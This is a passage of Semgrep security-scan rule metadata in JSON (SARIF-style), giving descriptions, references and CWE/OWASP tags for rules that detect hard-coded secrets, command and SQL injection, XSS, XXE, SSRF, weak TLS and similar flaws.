your company policy."},"helpUri":"https://semgrep.dev/r/rust.secrets.diesel.mysql-connection-empty-password.mysql-connection-empty-password","id":"rust.secrets.diesel.mysql-connection-empty-password.mysql-connection-empty-password","name":"rust.secrets.diesel.mysql-connection-empty-password.mysql-connection-empty-password","properties":{"precision":"very-high","tags":["CWE-287: Improper Authentication","HIGH CONFIDENCE","OWASP-A02:2017 - Broken Authentication","OWASP-A07:2021 - Identification and Authentication Failures","security"]},"shortDescription":{"text":"Semgrep Finding: rust.secrets.diesel.mysql-connection-empty-password.mysql-connection-empty-password"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"Default routes are enabled in this routes file. This means any public method on a controller can be called as an action. It is very easy to accidentally expose a method you didn't mean to. Instead, remove this line and explicitly include all routes you intend external users to follow."},"help":{"markdown":"Default routes are enabled in this routes file. This means any public method on a controller can be called as an action. It is very easy to accidentally expose a method you didn't mean to. Instead, remove this line and explicitly include all routes you intend external users to follow.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/ruby.rails.security.audit.xss.avoid-default-routes.avoid-default-routes)\n - [https://github.com/presidentbeef/brakeman/blob/main/docs/warning_types/default_routes/index.markdown](https://github.com/presidentbeef/brakeman/blob/main/docs/warning_types/default_routes/index.markdown)\n","text":"Default routes are enabled in this routes file. This means any public method on a controller can be called as an action. It is very easy to accidentally expose a method you didn't mean to. Instead, remove this line and explicitly include all routes you intend external users to follow."},"helpUri":"https://semgrep.dev/r/ruby.rails.security.audit.xss.avoid-default-routes.avoid-default-routes","id":"ruby.rails.security.audit.xss.avoid-default-routes.avoid-default-routes","name":"ruby.rails.security.audit.xss.avoid-default-routes.avoid-default-routes","properties":{"precision":"very-high","tags":["CWE-276: Incorrect Default Permissions","LOW CONFIDENCE","OWASP-A01:2021 - Broken Access Control","security"]},"shortDescription":{"text":"Semgrep Finding: ruby.rails.security.audit.xss.avoid-default-routes.avoid-default-routes"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"Possibility of prototype polluting function detected. By adding or modifying attributes of an object prototype, it is possible to create attributes that exist on every object, or replace critical attributes with malicious ones. This can be problematic if the software depends on existence or non-existence of certain attributes, or uses pre-defined attributes of object prototype (such as hasOwnProperty, toString or valueOf). Possible mitigations might be: freezing the object prototype, using an object without prototypes (via Object.create(null) ), blocking modifications of attributes that resolve to object prototype, using Map instead of object."},"help":{"markdown":"Possibility of prototype polluting function detected. By adding or modifying attributes of an object prototype, it is possible to create attributes that exist on every object, or replace critical attributes with malicious ones. This can be problematic if the software depends on existence or non-existence of certain attributes, or uses pre-defined attributes of object prototype (such as hasOwnProperty, toString or valueOf). Possible mitigations might be: freezing the object prototype, using an object without prototypes (via Object.create(null) ), blocking modifications of attributes that resolve to object prototype, using Map instead of object.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/javascript.lang.security.audit.prototype-pollution.prototype-pollution-loop.prototype-pollution-loop)\n - [https://github.com/HoLyVieR/prototype-pollution-nsec18/blob/master/paper/JavaScript_prototype_pollution_attack_in_NodeJS.pdf](https://github.com/HoLyVieR/prototype-pollution-nsec18/blob/master/paper/JavaScript_prototype_pollution_attack_in_NodeJS.pdf)\n","text":"Possibility of prototype polluting function detected. By adding or modifying attributes of an object prototype, it is possible to create attributes that exist on every object, or replace critical attributes with malicious ones. This can be problematic if the software depends on existence or non-existence of certain attributes, or uses pre-defined attributes of object prototype (such as hasOwnProperty, toString or valueOf). Possible mitigations might be: freezing the object prototype, using an object without prototypes (via Object.create(null) ), blocking modifications of attributes that resolve to object prototype, using Map instead of object."},"helpUri":"https://semgrep.dev/r/javascript.lang.security.audit.prototype-pollution.prototype-pollution-loop.prototype-pollution-loop","id":"javascript.lang.security.audit.prototype-pollution.prototype-pollution-loop.prototype-pollution-loop","name":"javascript.lang.security.audit.prototype-pollution.prototype-pollution-loop.prototype-pollution-loop","properties":{"precision":"very-high","tags":["CWE-915: Improperly Controlled Modification of Dynamically-Determined Object Attributes","LOW CONFIDENCE","OWASP-A08:2021 - Software and Data Integrity Failures","security"]},"shortDescription":{"text":"Semgrep Finding: javascript.lang.security.audit.prototype-pollution.prototype-pollution-loop.prototype-pollution-loop"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"A secret is hard-coded in the application. Secrets stored in source code, such as credentials, identifiers, and other types of sensitive data, can be leaked and used by internal or external malicious actors. Use environment variables to securely provide credentials and other secrets or retrieve them from a secure vault or Hardware Security Module (HSM)."},"help":{"markdown":"A secret is hard-coded in the application. Secrets stored in source code, such as credentials, identifiers, and other types of sensitive data, can be leaked and used by internal or external malicious actors. Use environment variables to securely provide credentials and other secrets or retrieve them from a secure vault or Hardware Security Module (HSM).\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/ruby.cassandra.ruby-cassandra-hardcoded-secret.ruby-cassandra-hardcoded-secret)\n - [https://cheatsheetseries.owasp.org/cheatsheets/Secrets_Management_Cheat_Sheet.html](https://cheatsheetseries.owasp.org/cheatsheets/Secrets_Management_Cheat_Sheet.html)\n","text":"A secret is hard-coded in the application. Secrets stored in source code, such as credentials, identifiers, and other types of sensitive data, can be leaked and used by internal or external malicious actors. Use environment variables to securely provide credentials and other secrets or retrieve them from a secure vault or Hardware Security Module (HSM)."},"helpUri":"https://semgrep.dev/r/ruby.cassandra.ruby-cassandra-hardcoded-secret.ruby-cassandra-hardcoded-secret","id":"ruby.cassandra.ruby-cassandra-hardcoded-secret.ruby-cassandra-hardcoded-secret","name":"ruby.cassandra.ruby-cassandra-hardcoded-secret.ruby-cassandra-hardcoded-secret","properties":{"precision":"very-high","tags":["CWE-798: Use of Hard-coded Credentials","HIGH CONFIDENCE","OWASP-A07:2021 - Identification and Authentication Failures","security"]},"shortDescription":{"text":"Semgrep Finding: ruby.cassandra.ruby-cassandra-hardcoded-secret.ruby-cassandra-hardcoded-secret"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"Checks for unsafe use of Object#send, try, __send__, and public_send. These only account for unsafe use of a method, not target. This can lead to arbitrary calling of exit, along with arbitrary code execution. Please be sure to sanitize input in order to avoid this."},"help":{"markdown":"Checks for unsafe use of Object#send, try, __send__, and public_send. These only account for unsafe use of a method, not target. This can lead to arbitrary calling of exit, along with arbitrary code execution. Please be sure to sanitize input in order to avoid this.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/ruby.lang.security.no-send.bad-send)\n - [https://github.com/presidentbeef/brakeman/blob/main/lib/brakeman/checks/check_send.rb](https://github.com/presidentbeef/brakeman/blob/main/lib/brakeman/checks/check_send.rb)\n - [https://the.igreque.info/posts/2016/01-object-send-considered-harmful-en.html](https://the.igreque.info/posts/2016/01-object-send-considered-harmful-en.html)\n","text":"Checks for unsafe use of Object#send, try, __send__, and public_send. These only account for unsafe use of a method, not target. This can lead to arbitrary calling of exit, along with arbitrary code execution. Please be sure to sanitize input in order to avoid this."},"helpUri":"https://semgrep.dev/r/ruby.lang.security.no-send.bad-send","id":"ruby.lang.security.no-send.bad-send","name":"ruby.lang.security.no-send.bad-send","properties":{"precision":"very-high","tags":["CWE-94: Improper Control of Generation of Code ('Code Injection')","LOW CONFIDENCE","OWASP-A03:2021 - Injection","security"]},"shortDescription":{"text":"Semgrep Finding: ruby.lang.security.no-send.bad-send"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"Detected an element with disabled HTML escaping. If external data can reach this, this is a cross-site scripting (XSS) vulnerability. Ensure no external data can reach here, or remove 'escape=false' from this element."},"help":{"markdown":"Detected an element with disabled HTML escaping. If external data can reach this, this is a cross-site scripting (XSS) vulnerability. Ensure no external data can reach here, or remove 'escape=false' from this element.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/java.lang.security.audit.xss.jsf.autoescape-disabled.autoescape-disabled)\n - [https://stackoverflow.com/a/7442668](https://stackoverflow.com/a/7442668)\n","text":"Detected an element with disabled HTML escaping. If external data can reach this, this is a cross-site scripting (XSS) vulnerability. Ensure no external data can reach here, or remove 'escape=false' from this element."},"helpUri":"https://semgrep.dev/r/java.lang.security.audit.xss.jsf.autoescape-disabled.autoescape-disabled","id":"java.lang.security.audit.xss.jsf.autoescape-disabled.autoescape-disabled","name":"java.lang.security.audit.xss.jsf.autoescape-disabled.autoescape-disabled","properties":{"precision":"very-high","tags":["CWE-150: Improper Neutralization of Escape, Meta, or Control Sequences","LOW CONFIDENCE","OWASP-A07:2017 - Cross-Site Scripting (XSS)","security"]},"shortDescription":{"text":"Semgrep Finding: java.lang.security.audit.xss.jsf.autoescape-disabled.autoescape-disabled"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"If unverified user data can reach the XML Parser it can result in XML External or Internal Entity (XXE) Processing vulnerabilities"},"help":{"markdown":"If unverified user data can reach the XML Parser it can result in XML External or Internal Entity (XXE) Processing vulnerabilities\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/javascript.node-expat.security.audit.expat-xxe.expat-xxe)\n - [https://owasp.org/Top10/A05_2021-Security_Misconfiguration](https://owasp.org/Top10/A05_2021-Security_Misconfiguration)\n","text":"If unverified user data can reach the XML Parser it can result in XML External or Internal Entity (XXE) Processing vulnerabilities"},"helpUri":"https://semgrep.dev/r/javascript.node-expat.security.audit.expat-xxe.expat-xxe","id":"javascript.node-expat.security.audit.expat-xxe.expat-xxe","name":"javascript.node-expat.security.audit.expat-xxe.expat-xxe","properties":{"precision":"very-high","tags":["CWE-611: Improper Restriction of XML External Entity Reference","LOW CONFIDENCE","OWASP-A04:2017 - XML External Entities (XXE)","OWASP-A05:2021 - Security Misconfiguration","security"]},"shortDescription":{"text":"Semgrep Finding: javascript.node-expat.security.audit.expat-xxe.expat-xxe"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"Password is exposed through JWT token payload. This is not encrypted and the password could be compromised. Do not store passwords in JWT tokens."},"help":{"markdown":"Password is exposed through JWT token payload. This is not encrypted and the password could be compromised. Do not store passwords in JWT tokens.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/ruby.jwt.security.jwt-exposed-credentials.ruby-jwt-exposed-credentials)\n - [https://cwe.mitre.org/data/definitions/522.html](https://cwe.mitre.org/data/definitions/522.html)\n","text":"Password is exposed through JWT token payload. This is not encrypted and the password could be compromised. Do not store passwords in JWT tokens."},"helpUri":"https://semgrep.dev/r/ruby.jwt.security.jwt-exposed-credentials.ruby-jwt-exposed-credentials","id":"ruby.jwt.security.jwt-exposed-credentials.ruby-jwt-exposed-credentials","name":"ruby.jwt.security.jwt-exposed-credentials.ruby-jwt-exposed-credentials","properties":{"precision":"very-high","tags":["CWE-522: Insufficiently Protected Credentials","LOW CONFIDENCE","OWASP-A02:2017 - Broken Authentication","OWASP-A04:2021 - Insecure Design","security"]},"shortDescription":{"text":"Semgrep Finding: ruby.jwt.security.jwt-exposed-credentials.ruby-jwt-exposed-credentials"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"SSLv3 is insecure because it has known vulnerabilities. Starting with go1.14, SSLv3 will be removed. Instead, use 'tls.VersionTLS13'."},"help":{"markdown":"SSLv3 is insecure because it has known vulnerabilities. Starting with go1.14, SSLv3 will be removed. Instead, use 'tls.VersionTLS13'.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/go.lang.security.audit.crypto.ssl.ssl-v3-is-insecure)\n - [https://golang.org/doc/go1.14#crypto/tls](https://golang.org/doc/go1.14#crypto/tls)\n - [https://www.us-cert.gov/ncas/alerts/TA14-290A](https://www.us-cert.gov/ncas/alerts/TA14-290A)\n","text":"SSLv3 is insecure because it has known vulnerabilities. Starting with go1.14, SSLv3 will be removed. Instead, use 'tls.VersionTLS13'."},"helpUri":"https://semgrep.dev/r/go.lang.security.audit.crypto.ssl.ssl-v3-is-insecure","id":"go.lang.security.audit.crypto.ssl.ssl-v3-is-insecure","name":"go.lang.security.audit.crypto.ssl.ssl-v3-is-insecure","properties":{"precision":"very-high","tags":["CWE-327: Use of a Broken or Risky Cryptographic Algorithm","HIGH CONFIDENCE","OWASP-A02:2021 - Cryptographic Failures","OWASP-A03:2017 - Sensitive Data Exposure","security"]},"shortDescription":{"text":"Semgrep Finding: go.lang.security.audit.crypto.ssl.ssl-v3-is-insecure"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"Bucket $X is not set to enforce encryption-in-transit, if not explictly setting this on the bucket policy - the property \"enforceSSL\" should be set to true"},"help":{"markdown":"Bucket $X is not set to enforce encryption-in-transit, if not explictly setting this on the bucket policy - the property \"enforceSSL\" should be set to true\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/typescript.aws-cdk.security.audit.awscdk-bucket-enforcessl.aws-cdk-bucket-enforcessl)\n - [https://docs.aws.amazon.com/AmazonS3/latest/userguide/security-best-practices.html](https://docs.aws.amazon.com/AmazonS3/latest/userguide/security-best-practices.html)\n","text":"Bucket $X is not set to enforce encryption-in-transit, if not explictly setting this on the bucket policy - the property \"enforceSSL\" should be set to true"},"helpUri":"https://semgrep.dev/r/typescript.aws-cdk.security.audit.awscdk-bucket-enforcessl.aws-cdk-bucket-enforcessl","id":"typescript.aws-cdk.security.audit.awscdk-bucket-enforcessl.aws-cdk-bucket-enforcessl","name":"typescript.aws-cdk.security.audit.awscdk-bucket-enforcessl.aws-cdk-bucket-enforcessl","properties":{"precision":"very-high","tags":["CWE-319: Cleartext Transmission of Sensitive Information","MEDIUM CONFIDENCE","OWASP-A02:2021 - Cryptographic Failures","OWASP-A03:2017 - Sensitive Data Exposure","security"]},"shortDescription":{"text":"Semgrep Finding: typescript.aws-cdk.security.audit.awscdk-bucket-enforcessl.aws-cdk-bucket-enforcessl"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"A secret is hard-coded in the application. Secrets stored in source code, such as credentials, identifiers, and other types of sensitive data, can be leaked and used by internal or external malicious actors. Use environment variables to securely provide credentials and other secrets or retrieve them from a secure vault or Hardware Security Module (HSM)."},"help":{"markdown":"A secret is hard-coded in the application. Secrets stored in source code, such as credentials, identifiers, and other types of sensitive data, can be leaked and used by internal or external malicious actors. Use environment variables to securely provide credentials and other secrets or retrieve them from a secure vault or Hardware Security Module (HSM).\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/ruby.redis.ruby-redis-hardcoded-uri.ruby-redis-hardcoded-uri)\n - [https://cheatsheetseries.owasp.org/cheatsheets/Secrets_Management_Cheat_Sheet.html](https://cheatsheetseries.owasp.org/cheatsheets/Secrets_Management_Cheat_Sheet.html)\n","text":"A secret is hard-coded in the application. Secrets stored in source code, such as credentials, identifiers, and other types of sensitive data, can be leaked and used by internal or external malicious actors. Use environment variables to securely provide credentials and other secrets or retrieve them from a secure vault or Hardware Security Module (HSM)."},"helpUri":"https://semgrep.dev/r/ruby.redis.ruby-redis-hardcoded-uri.ruby-redis-hardcoded-uri","id":"ruby.redis.ruby-redis-hardcoded-uri.ruby-redis-hardcoded-uri","name":"ruby.redis.ruby-redis-hardcoded-uri.ruby-redis-hardcoded-uri","properties":{"precision":"very-high","tags":["CWE-798: Use of Hard-coded Credentials","HIGH CONFIDENCE","OWASP-A07:2021 - Identification and Authentication Failures","security"]},"shortDescription":{"text":"Semgrep Finding: ruby.redis.ruby-redis-hardcoded-uri.ruby-redis-hardcoded-uri"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"Untrusted input might be injected into a command executed by the application, which can lead to a command injection vulnerability. An attacker can execute arbitrary commands, potentially gaining complete control of the system. To prevent this vulnerability, avoid executing OS commands with user input. If this is unavoidable, validate and sanitize the input, and use safe methods for executing the commands."},"help":{"markdown":"Untrusted input might be injected into a command executed by the application, which can lead to a command injection vulnerability. An attacker can execute arbitrary commands, potentially gaining complete control of the system. To prevent this vulnerability, avoid executing OS commands with user input. If this is unavoidable, validate and sanitize the input, and use safe methods for executing the commands.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/python.django.os.tainted-os-command-stdlib-django-secure-if-array.tainted-os-command-stdlib-django-secure-if-array)\n - [https://docs.python.org/3/library/os.html](https://docs.python.org/3/library/os.html)\n - [https://docs.python.org/3/library/subprocess.html#subprocess.Popen](https://docs.python.org/3/library/subprocess.html#subprocess.Popen)\n - [https://owasp.org/Top10/A03_2021-Injection](https://owasp.org/Top10/A03_2021-Injection)\n - [https://semgrep.dev/docs/cheat-sheets/python-command-injection/](https://semgrep.dev/docs/cheat-sheets/python-command-injection/)\n - [https://stackless.readthedocs.io/en/v2.7.16-slp/library/commands.html](https://stackless.readthedocs.io/en/v2.7.16-slp/library/commands.html)\n","text":"Untrusted input might be injected into a command executed by the application, which can lead to a command injection vulnerability. An attacker can execute arbitrary commands, potentially gaining complete control of the system. To prevent this vulnerability, avoid executing OS commands with user input. If this is unavoidable, validate and sanitize the input, and use safe methods for executing the commands."},"helpUri":"https://semgrep.dev/r/python.django.os.tainted-os-command-stdlib-django-secure-if-array.tainted-os-command-stdlib-django-secure-if-array","id":"python.django.os.tainted-os-command-stdlib-django-secure-if-array.tainted-os-command-stdlib-django-secure-if-array","name":"python.django.os.tainted-os-command-stdlib-django-secure-if-array.tainted-os-command-stdlib-django-secure-if-array","properties":{"precision":"very-high","tags":["CWE-78: Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection')","HIGH CONFIDENCE","OWASP-A01:2017 - Injection","OWASP-A03:2021 - Injection","security"]},"shortDescription":{"text":"Semgrep Finding: python.django.os.tainted-os-command-stdlib-django-secure-if-array.tainted-os-command-stdlib-django-secure-if-array"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"Untrusted input might be injected into a command executed by the application, which can lead to a command injection vulnerability. An attacker can execute arbitrary commands, potentially gaining complete control of the system. To prevent this vulnerability, avoid executing OS commands with user input. If this is unavoidable, validate and sanitize the input, and use safe methods for executing the commands."},"help":{"markdown":"Untrusted input might be injected into a command executed by the application, which can lead to a command injection vulnerability. An attacker can execute arbitrary commands, potentially gaining complete control of the system. To prevent this vulnerability, avoid executing OS commands with user input. If this is unavoidable, validate and sanitize the input, and use safe methods for executing the commands.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/python.lang.os.tainted-os-command-stdlib.tainted-os-command-stdlib)\n - [https://docs.python.org/3/library/os.html](https://docs.python.org/3/library/os.html)\n - [https://docs.python.org/3/library/subprocess.html#subprocess.Popen](https://docs.python.org/3/library/subprocess.html#subprocess.Popen)\n - [https://owasp.org/Top10/A03_2021-Injection](https://owasp.org/Top10/A03_2021-Injection)\n - [https://semgrep.dev/docs/cheat-sheets/python-command-injection/](https://semgrep.dev/docs/cheat-sheets/python-command-injection/)\n - [https://stackless.readthedocs.io/en/v2.7.16-slp/library/commands.html](https://stackless.readthedocs.io/en/v2.7.16-slp/library/commands.html)\n","text":"Untrusted input might be injected into a command executed by the application, which can lead to a command injection vulnerability. An attacker can execute arbitrary commands, potentially gaining complete control of the system. To prevent this vulnerability, avoid executing OS commands with user input. If this is unavoidable, validate and sanitize the input, and use safe methods for executing the commands."},"helpUri":"https://semgrep.dev/r/python.lang.os.tainted-os-command-stdlib.tainted-os-command-stdlib","id":"python.lang.os.tainted-os-command-stdlib.tainted-os-command-stdlib","name":"python.lang.os.tainted-os-command-stdlib.tainted-os-command-stdlib","properties":{"precision":"very-high","tags":["CWE-78: Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection')","HIGH CONFIDENCE","OWASP-A01:2017 - Injection","OWASP-A03:2021 - Injection","security"]},"shortDescription":{"text":"Semgrep Finding: python.lang.os.tainted-os-command-stdlib.tainted-os-command-stdlib"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"A secret is hard-coded in the application. Secrets stored in source code, such as credentials, identifiers, and other types of sensitive data, can be leaked and used by internal or external malicious actors. Use environment variables to securely provide credentials and other secrets or retrieve them from a secure vault or Hardware Security Module (HSM)."},"help":{"markdown":"A secret is hard-coded in the application. Secrets stored in source code, such as credentials, identifiers, and other types of sensitive data, can be leaked and used by internal or external malicious actors. Use environment variables to securely provide credentials and other secrets or retrieve them from a secure vault or Hardware Security Module (HSM).\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/csharp.lang.security.system.oracleconnectionstringbuilder-hardcoded-secret.oracleconnectionstringbuilder-hardcoded-secret)\n - [https://cheatsheetseries.owasp.org/cheatsheets/Secrets_Management_Cheat_Sheet.html](https://cheatsheetseries.owasp.org/cheatsheets/Secrets_Management_Cheat_Sheet.html)\n","text":"A secret is hard-coded in the application. Secrets stored in source code, such as credentials, identifiers, and other types of sensitive data, can be leaked and used by internal or external malicious actors. Use environment variables to securely provide credentials and other secrets or retrieve them from a secure vault or Hardware Security Module (HSM)."},"helpUri":"https://semgrep.dev/r/csharp.lang.security.system.oracleconnectionstringbuilder-hardcoded-secret.oracleconnectionstringbuilder-hardcoded-secret","id":"csharp.lang.security.system.oracleconnectionstringbuilder-hardcoded-secret.oracleconnectionstringbuilder-hardcoded-secret","name":"csharp.lang.security.system.oracleconnectionstringbuilder-hardcoded-secret.oracleconnectionstringbuilder-hardcoded-secret","properties":{"precision":"very-high","tags":["CWE-798: Use of Hard-coded Credentials","HIGH CONFIDENCE","OWASP-A07:2021 - Identification and Authentication Failures","security"]},"shortDescription":{"text":"Semgrep Finding: csharp.lang.security.system.oracleconnectionstringbuilder-hardcoded-secret.oracleconnectionstringbuilder-hardcoded-secret"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"Untrusted input might be used to build a database query, which can lead to a SQL injection vulnerability. An attacker can execute malicious SQL statements and gain unauthorized access to sensitive data, modify, delete data, or execute arbitrary system commands. To prevent this vulnerability, use prepared statements that do not concatenate user-controllable strings and use parameterized queries where SQL commands and user data are strictly separated. Also, consider using an object-relational (ORM) framework to operate with safer abstractions."},"help":{"markdown":"Untrusted input might be used to build a database query, which can lead to a SQL injection vulnerability. An attacker can execute malicious SQL statements and gain unauthorized access to sensitive data, modify, delete data, or execute arbitrary system commands. To prevent this vulnerability, use prepared statements that do not concatenate user-controllable strings and use parameterized queries where SQL commands and user data are strictly separated. Also, consider using an object-relational (ORM) framework to operate with safer abstractions.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/csharp.dotnet-core.sqli.entityframework-taint.entityframework-taint)\n - [https://owasp.org/Top10/A03_2021-Injection](https://owasp.org/Top10/A03_2021-Injection)\n","text":"Untrusted input might be used to build a database query, which can lead to a SQL injection vulnerability. An attacker can execute malicious SQL statements and gain unauthorized access to sensitive data, modify, delete data, or execute arbitrary system commands. To prevent this vulnerability, use prepared statements that do not concatenate user-controllable strings and use parameterized queries where SQL commands and user data are strictly separated. Also, consider using an object-relational (ORM) framework to operate with safer abstractions."},"helpUri":"https://semgrep.dev/r/csharp.dotnet-core.sqli.entityframework-taint.entityframework-taint","id":"csharp.dotnet-core.sqli.entityframework-taint.entityframework-taint","name":"csharp.dotnet-core.sqli.entityframework-taint.entityframework-taint","properties":{"precision":"very-high","tags":["CWE-89: Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')","HIGH CONFIDENCE","OWASP-A01:2017 - Injection","OWASP-A03:2021 - Injection","security"]},"shortDescription":{"text":"Semgrep Finding: csharp.dotnet-core.sqli.entityframework-taint.entityframework-taint"}},{"defaultConfiguration":{"level":"note"},"fullDescription":{"text":"The seed value of a Pseudo Random Number Generator (PRNG) is directly derived from the time, which is highly predictable. Do not use values from this PRNG to derive a secrets, such as passwords or cryptographic keys."},"help":{"markdown":"The seed value of a Pseudo Random Number Generator (PRNG) is directly derived from the time, which is highly predictable. Do not use values from this PRNG to derive a secrets, such as passwords or cryptographic keys.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/cpp.lang.security.rng.predictable-seed-rng-time.predictable-seed-rng-time)\n - [https://owasp.org/Top10/A02_2021-Cryptographic_Failures](https://owasp.org/Top10/A02_2021-Cryptographic_Failures)\n - [https://wiki.sei.cmu.edu/confluence/display/cplusplus/MSC51-CPP.+Ensure+your+random+number+generator+is+properly+seeded](https://wiki.sei.cmu.edu/confluence/display/cplusplus/MSC51-CPP.+Ensure+your+random+number+generator+is+properly+seeded)\n","text":"The seed value of a Pseudo Random Number Generator (PRNG) is directly derived from the time, which is highly predictable. Do not use values from this PRNG to derive a secrets, such as passwords or cryptographic keys."},"helpUri":"https://semgrep.dev/r/cpp.lang.security.rng.predictable-seed-rng-time.predictable-seed-rng-time","id":"cpp.lang.security.rng.predictable-seed-rng-time.predictable-seed-rng-time","name":"cpp.lang.security.rng.predictable-seed-rng-time.predictable-seed-rng-time","properties":{"precision":"very-high","tags":["CWE-337: Predictable Seed in Pseudo-Random Number Generator (PRNG)","HIGH CONFIDENCE","OWASP-A02:2021 - Cryptographic Failures","security"]},"shortDescription":{"text":"Semgrep Finding: cpp.lang.security.rng.predictable-seed-rng-time.predictable-seed-rng-time"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"SendGrid API Key detected"},"help":{"markdown":"SendGrid API Key detected\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/generic.secrets.security.detected-sendgrid-api-key.detected-sendgrid-api-key)\n - [https://owasp.org/Top10/A07_2021-Identification_and_Authentication_Failures](https://owasp.org/Top10/A07_2021-Identification_and_Authentication_Failures)\n","text":"SendGrid API Key detected"},"helpUri":"https://semgrep.dev/r/generic.secrets.security.detected-sendgrid-api-key.detected-sendgrid-api-key","id":"generic.secrets.security.detected-sendgrid-api-key.detected-sendgrid-api-key","name":"generic.secrets.security.detected-sendgrid-api-key.detected-sendgrid-api-key","properties":{"precision":"very-high","tags":["CWE-798: Use of Hard-coded Credentials","LOW CONFIDENCE","OWASP-A07:2021 - Identification and Authentication Failures","security"]},"shortDescription":{"text":"Semgrep Finding: generic.secrets.security.detected-sendgrid-api-key.detected-sendgrid-api-key"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"Detected an insecure redirect in this nginx configuration. If no scheme is specified, nginx will forward the request with the incoming scheme. This could result in unencrypted communications. To fix this, include the 'https' scheme."},"help":{"markdown":"Detected an insecure redirect in this nginx configuration. If no scheme is specified, nginx will forward the request with the incoming scheme. This could result in unencrypted communications. To fix this, include the 'https' scheme.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/generic.nginx.security.insecure-redirect.insecure-redirect)\n - [https://owasp.org/Top10/A02_2021-Cryptographic_Failures](https://owasp.org/Top10/A02_2021-Cryptographic_Failures)\n","text":"Detected an insecure redirect in this nginx configuration. If no scheme is specified, nginx will forward the request with the incoming scheme. This could result in unencrypted communications. To fix this, include the 'https' scheme."},"helpUri":"https://semgrep.dev/r/generic.nginx.security.insecure-redirect.insecure-redirect","id":"generic.nginx.security.insecure-redirect.insecure-redirect","name":"generic.nginx.security.insecure-redirect.insecure-redirect","properties":{"precision":"very-high","tags":["CWE-319: Cleartext Transmission of Sensitive Information","LOW CONFIDENCE","OWASP-A02:2021 - Cryptographic Failures","OWASP-A03:2017 - Sensitive Data Exposure","security"]},"shortDescription":{"text":"Semgrep Finding: generic.nginx.security.insecure-redirect.insecure-redirect"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"Untrusted input might be used to build an HTTP request, which can lead to a Server-side request forgery (SSRF) vulnerability. SSRF allows an attacker to send crafted requests from the server side to other internal or external systems. SSRF can lead to unauthorized access to sensitive data and, in some cases, allow the attacker to control applications or systems that trust the vulnerable service. To prevent this vulnerability, avoid allowing user input to craft the base request. Instead, treat it as part of the path or query parameter and encode it appropriately. When user input is necessary to prepare the HTTP request, perform strict input validation. Additionally, whenever possible, use allowlists to only interact with expected, trusted domains."},"help":{"markdown":"Untrusted input might be used to build an HTTP request, which can lead to a Server-side request forgery (SSRF) vulnerability. SSRF allows an attacker to send crafted requests from the server side to other internal or external systems. SSRF can lead to unauthorized access to sensitive data and, in some cases, allow the attacker to control applications or systems that trust the vulnerable service. To prevent this vulnerability, avoid allowing user input to craft the base request. Instead, treat it as part of the path or query parameter and encode it appropriately. When user input is necessary to prepare the HTTP request, perform strict input validation. Additionally, whenever possible, use allowlists to only interact with expected, trusted domains.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/java.servlets.security.tainted-ssrf-deepsemgrep-format.tainted-ssrf-deepsemgrep-format)\n - [https://owasp.org/Top10/A10_2021-Server-Side_Request_Forgery_%28SSRF%29](https://owasp.org/Top10/A10_2021-Server-Side_Request_Forgery_%28SSRF%29)\n","text":"Untrusted input might be used to build an HTTP request, which can lead to a Server-side request forgery (SSRF) vulnerability. SSRF allows an attacker to send crafted requests from the server side to other internal or external systems. SSRF can lead to unauthorized access to sensitive data and, in some cases, allow the attacker to control applications or systems that trust the vulnerable service. To prevent this vulnerability, avoid allowing user input to craft the base request. Instead, treat it as part of the path or query parameter and encode it appropriately. When user input is necessary to prepare the HTTP request, perform strict input validation. Additionally, whenever possible, use allowlists to only interact with expected, trusted domains."},"helpUri":"https://semgrep.dev/r/java.servlets.security.tainted-ssrf-deepsemgrep-format.tainted-ssrf-deepsemgrep-format","id":"java.servlets.security.tainted-ssrf-deepsemgrep-format.tainted-ssrf-deepsemgrep-format","name":"java.servlets.security.tainted-ssrf-deepsemgrep-format.tainted-ssrf-deepsemgrep-format","properties":{"precision":"very-high","tags":["CWE-918: Server-Side Request Forgery (SSRF)","HIGH CONFIDENCE","OWASP-A10:2021 - Server-Side Request Forgery (SSRF)","security"]},"shortDescription":{"text":"Semgrep Finding: java.servlets.security.tainted-ssrf-deepsemgrep-format.tainted-ssrf-deepsemgrep-format"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"The application creates a database connection with an empty password. This can lead to unauthorized access by either an internal or external malicious actor. To prevent this 